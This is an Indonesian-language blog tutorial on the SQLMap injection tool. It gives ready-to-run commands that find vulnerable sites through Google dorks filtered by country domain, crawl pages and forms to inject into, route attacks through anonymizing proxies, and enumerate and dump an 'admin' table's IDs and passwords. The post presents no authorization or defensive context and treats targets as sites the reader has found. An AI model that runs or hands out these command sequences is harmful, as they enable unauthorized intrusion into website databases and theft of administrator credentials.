Minggu, 10 Mei 2015

Tutorial Use SQLMap


http://sqlmap.org/images/screenshot.png
SQLMAP TUTORIAL

Kali ini saya akan memberikan sebuah tutorial tentang software/aplikasi yang mendukung software python. SQLMAP adalah aplikasi yang dapat memetakan sebuah DB dari web vuln. Langsung saja kita mulai.
# Start SQLMap
C:python/sqlmap/sqlmap.py –hh  <<(perintah ini digunakan untuk melihat perintah apa saja yang adad di SQLMAP

Saya asumsikan kalian sudah mengetahui target yang ada.
1. Command option -u
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs
Perintah yang di atas akan melakukan serangan berbasis Sebagai alternatif pada BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), dari serangan normal.

Untuk memfokuskan serangan dengan teknik serangan spesifikAnda dapat mengaturnya di perintahinjeksi, misalnya ketika Anda melakukan injeksi petunjuk untuk target ini dengan melakukan sesuatuseperti ini :
http://www.domain.com/article.php?id=7'
http://www.domain.com/article.php?id=7 and 1=0
dan Anda melihat ada pesan error SQL pada halaman, maka Anda mungkin ingin mengatur teknikserangan dengan opsi:  –tech=E

Sebaliknyajika Anda tidak melihat apa-apatetapi Anda cukup yakin bahwa ada sebuah titik injeksipada halaman tersebut atau hanya ingin menguji injeksi.

2. Command option -g (crawl potential targets from Google results)
                Dengan pilihan -g, kita bisa menjelajah setiap target potensial dari hasil Google berdasarkan dork diinput.
C:python/sqlmap/sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs
Untuk menjelajah dari situs tertentu berdasarkan di mana domain negara terdaftar, misalnya.com.sg
C:python/sqlmap /sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs

Tentu, Anda dapat menggunakan Dorks Google lainnya seperti yang Anda inginkan.

Jika Anda tidak melihat serangan sedang diproses, itu berarti tidak ada titik injeksi potensial yang dapat disisipkan. Potensi titik injeksi link URL harus mengandung setidaknya satu parameter GET, misalnya:?? Php id =, Asp pid =, dll ..

3. Command option –crawl
Injection command:
C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs
Perintah yang di atas akan menjelajah setiap link yang ditemukan di situs web tertentu dan akan menyuntikkan Link yang memiliki GET parameter di dalamnya.
*crawl: menjelajah melalui setiap link di halaman situs. Kami menggunakan -crawl = 3 berarti akan menjelajah secara mendalam sampai kedalaman "3" halaman.

Contoh:
http://www.domain.com, mempunyai link/menu/page “articles”.
Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/

Pilihan -crawl= 3 akan menjelajah setiap link yang ditemukan di kedalaman 1, 2, dan 3, tetapi tidak mendalam 4. Oke, saya harap Anda mengerti.

Anda bebas untuk mengatur kedalaman menjelajah seperti yang Anda inginkan. Tapi, ingat semakin Anda mengatur kedalaman menjelajah, semakin Anda akan mendapatkan banyak link untuk menyuntikkan (jika memiliki parameter GET).

4. Command option –forms
Injection command:
C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms –dbs
Perintah yang di atas akan mencoba untuk mencari bentuk POST di halaman situs. Sebagai contoh: di homepage akan ada beberapa bentuk seperti pencarian, form login, dll

Tapi, bagaimana jika bentuk POST berada di halaman lain secara mendalam
dalam website dan kita tidak tahu di mana itu? Kita bisa bergabung dengan perintah -crawl sebelumnya.
Contoh :
C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms –dbs
5. Command option –proxy
C:python/sqlmap /sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" –dbs
Cari beberapa IP proxy yang bekerja dan port. Biasanya di web yg menyediakan proxy/sock5, sepertihttp://hidemyass.com/proxy-list
6. Command option –dbms
Misalkan kita cukup yakin bahwa situs target menggunakan tipe database MySQLKita bisamengaturnya di perintah dengan opsi -dbms = mysqlsehingga akan lebih cepat dalam serangan injeksi, daripada memutar melalui semua jenis database seperti OracleMSSQL, dll
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql –dbs
7. Command option -D, -T, -C
-D: dump database
-T: dump table
-C: dump column

Katakanlah kita punya nama database seperti: sitedb.
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb –T
Perintah yang di atas akan enumerasi semua nama tabel dari database "sitedb".

Katakanlah kita punya 15 tabel namasalah satunya adalahadminDan kita ingin menghitung namakolom tersebut.

Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin –C
Perintah yang di atas akan enumerasi semua nama kolom dari database "sitedb" dan tabel "admin".

Katakanlah kita punya 6 kolom namamisalnyaidadmin_idadmin_passadmin_fullnameadmin_mail,admin_level.

Kami ingin membuang semua data dalam tabel "admin".

Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump
Atau jika Anda ingindumping hanya kolom tertentu, seperti "admin_id" dan "admin_pass"
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump

Itu hanya beberapa command/perintah yang digunakan pada SQLMAP. Jika kalian ingin berkembang, silahkan jelajahi di google dan BING

0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.